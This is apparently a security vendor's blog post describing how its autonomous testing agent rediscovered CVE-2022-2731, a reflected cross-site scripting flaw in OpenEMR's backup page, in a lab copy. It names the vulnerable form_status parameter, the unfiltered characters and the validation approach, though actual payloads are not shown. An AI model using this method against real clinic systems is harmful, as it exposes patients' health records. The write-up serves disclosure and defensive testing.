OpenEMR is a widely deployed open source electronic health records system, serving over 100,000 medical providers worldwide and managing sensitive health information for millions of patients. When vulnerabilities exist in software handling protected health information, the consequences extend beyond technical exploitation to regulatory compliance failures and patient privacy breaches.
To evaluate Sara’s capabilities against real world targets, we directed our autonomous security agent, Sara, towards CVE-2022-2731, a reflected cross-site scripting vulnerability in OpenEMR’s backup interface originally discovered by the Secure D Center Research Team. Rather than testing against synthetic benchmarks, we wanted to understand how Sara would approach a production healthcare application with authentic complexity. This includes authentication flows, multi-step workflows and the kind of state management that characterizes enterprise software.
For healthcare organizations using OpenEMR, this vulnerability presents a real risk. An attacker would create a malicious URL with an XSS payload and send it to a clinic administrator, likely via an email impersonating a system notification (e.g., about backup failures or storage warnings). If the authenticated administrator clicks the link, the embedded JavaScript will execute in their browser session, granting the attacker full control over the OpenEMR backup interface.
Reflected XSS occurs when an application incorporates untrusted data from an HTTP request directly into the response without proper sanitization. Unlike stored XSS, where malicious scripts persist in the database and affect all visitors, reflected XSS is transient; the payload exists only in a crafted URL or form submission.
The vulnerability was disclosed through Huntr and assigned a CVSS score of 5.4 (Medium). What follows is a detailed examination of how Sara independently rediscovered and validated this vulnerability, demonstrating the systematic methodology that enables autonomous security testing at scale.
Setting the Stage
To ensure our evaluation, we established a controlled, reproducible testing environment by cloning the OpenEMR codebase. We then locked the environment to the exact historical state of the vulnerability by checking out commit hash 285fb234bd27ea4c46a29f2797edda7f38f1d8db. This step isolated the application at the moment the security flaw existed, providing a foundation for Sara to execute its autonomous investigation.
Reconnaissance and Discovery
The Session Error Pivot
After running the OpenEMR application, the agent’s first attempt to access the application was met with an immediate obstacle, a session error.
Using browser automation, the agent navigated to the login page, filled the credentials provided (admin/pass), and successfully authenticated.
The agent then extracted the session identifier:
The agent then crawls the application, including the vulnerable page /interface/main/backup.php, which is a single PHP page responsible for creating and managing database backups. The agent’s initial objective was to systematically test every user controlled input on this page for XSS vulnerabilities.
Discovering the State Machine
With authentication complete, the agent captured the page structure and immediately identified something that would prove critical: this wasn’t a simple single-page form. JavaScript comments in the source code revealed a sophisticated multi-step workflow:
The agent then systematically enumerated 22 distinct form_step values to map the entire state machine:
| Step Range | Page Lines | Behavior |
|---|---|---|
| 0 | 100 | Initial state |
| 1-5 | 90 | Backup process (2 reflection points) |
| 101 | 292 | Export configuration (3x larger) |
| 102.1, 102.2 | 0 | File downloads (empty response) |
| 201 | 94 | Import/upload form |
| 405 | 71 | Delete operation (no reflection) |
Step 101 exposed 13 additional parameters invisible in other states form_cb_services, form_cb_products, form_sel_lists[]. Each one requires testing. One anomaly stood out, step 405, the delete operation, showed zero reflections while every other non download state reflected the canary string at least once. The code path handling destructive operations appeared to implement stricter controls. Whether by design or coincidence, the delete function was hardened against this vulnerability class while export and backup operations were not.
Before finding the vulnerable parameter, Sara tested 34 input vectors that showed no reflection. This is the critical reconnaissance work that the agent follows to thoroughly test an application.
Sara tested common parameter names that might accept reflected input:
HTTP Headers (5 tested, 0 vulnerable):
Step 101 Parameters (10+ tested, 0 vulnerable):
The export configuration state exposed additional form fields. Sara tested each one:
Finding Reflection
With the attack surface mapped, 22 workflow states, 27 parameters, 5 HTTP headers, and URI paths, Sara moves to context identification. Using a unique canary string (xss7e8f2a), it probed each parameter for reflection.
The response revealed what 34 previous tests had not:
The response indicated reflection in the form_status parameter:
Reflection Context 1 – HTML Body (Line 72):
Reflection Context 2 – HTML Attribute (Line 78):
The dual reflection is significant. The body context allows direct script injection; the attribute context offers an alternative vector through event handlers if the body context were filtered. Neither appeared to be sanitized, but Sara needed to confirm that systematically before attempting exploitation.
Probing the Parameter
Rather than immediately spraying XSS payloads, the agent follows a systematic approach, testing individual special characters to understand exactly what the application would allow.
First, a combined probe:
Then, character by character isolation:
The responses came back unchanged:
The agent documented its findings methodically:
| Character | Filter Behavior |
|---|---|
| < | Passed through |
| > | Passed through |
| “ | Passed through |
| ‘ | Passed through |
| ; | Passed through |
| / | Passed through |
| \ | Passed through |
This confirms that there is no encoding, no filtering and no sanitization.
This was the moment the agent’s systematic approach paid off. With both angle brackets and quotes passing through unencoded, XSS exploitation was highly likely.
Crafting a Payload
With the sanitization profile complete, the agent selected the most straightforward payload for the HTML body context:
The presence of the script builds the case for the presence of the XSS vulnerability.
The payload was injected verbatim into the response body. But finding reflected content isn’t enough to prove exploitation; Sara needs to prove execution.
Validating the Vulnerability
Finding reflected content in an HTTP response is not the same as confirming exploitability. Security scanners frequently flag reflection without verifying that the payload actually executes in a browser context, a gap that produces false positives and reduces confidence in automated findings. Sara’s methodology requires browser based validation. If the JavaScript doesn’t execute in a real rendering engine, the vulnerability isn’t reported.
To confirm exploitation, Sara constructed a PoC using Playwright that simulates the complete attack chain. The automation authenticates to OpenEMR, extracts a valid CSRF token from the backup interface, injects the XSS payload into the form_status parameter, and submits the form. A dialog handler captures any JavaScript alerts triggered during page rendering.
The browser returned a dialog event with the message “XSS”, confirming that the injected script executed in the authenticated session context. This validation step is what separates Sara’s findings from pattern matching scanners. The vulnerability exists not because the payload appears in the response, but because it runs.
Sara then performed a secondary validation. Alert dialogs can be suppressed by browser configurations or security tools, so it injected a payload that modified the DOM directly:
The browser rendered the injected content:
Two independent validation methods, both successful. The vulnerability exists not because the payload appears in the response, but because it executes.
The Impact
From this position, the attacker can exfiltrate session tokens to maintain persistent access, intercept database exports as they’re generated, or modify backup parameters to exclude audit logs that might reveal the compromise. Because the backup interface handles complete database dumps, a successful attack provides access to patient demographics, diagnoses, medication histories, insurance information, and clinical notes, the full spectrum of protected health information.
Under HIPAA, unauthorized access to PHI triggers breach notification requirements. A clinic discovering this exploitation would face mandatory reporting to affected patients, the Department of Health and Human Services, and potentially media outlets if the breach exceeds 500 individuals. Beyond regulatory penalties, the reputational damage to a healthcare provider stems from a vulnerability in administrative tooling, systems that patients never see but that determine whether their medical histories remain confidential.
The CVSS score of 5.4 (Medium) reflects the requirement for user interaction and authenticated access. In practice, the severity depends entirely on context. A single physician practice and a hospital network running the same vulnerable code face vastly different exposure and risk profiles.
Conclusion
CVE-2022-2731 does not require intricate exploitation chains, novel bypass techniques or multi-stage attacks. The flaw is a failure to sanitize user input before reflecting it in HTML. Yet this vulnerability persisted in production healthcare software, in an interface accessed by administrators with database export privileges.
What this exercise demonstrates is Sara’s capacity for thorough, systematic coverage. Sara enumerated 22 distinct workflow states, tested 27 parameters across each state, probed 5 HTTP headers, and validated character level filter behavior before constructing a working payload. It authenticated when blocked, adapted when the application presented a state machine rather than a simple form, and confirmed exploitation through actual browser execution rather than simple pattern matching.
This is the work that doesn’t happen in time constrained manual assessments. A penetration tester with a week-long engagement might test the backup interface, find no obvious issues with the primary form fields, and move on. Sara tested form_status because it tested everything, including parameters that only appear in specific workflow states, inputs that seem purely informational, and contexts that don’t obviously accept user data.
For organizations handling protected health information, systematic testing finds oversights. The next vulnerability may not be in backup.php. It may be in an export function, a configuration page or an administrative workflow that sees limited security scrutiny precisely because it requires elevated privileges to access. Sara’s methodology scales to find these gaps before attackers do.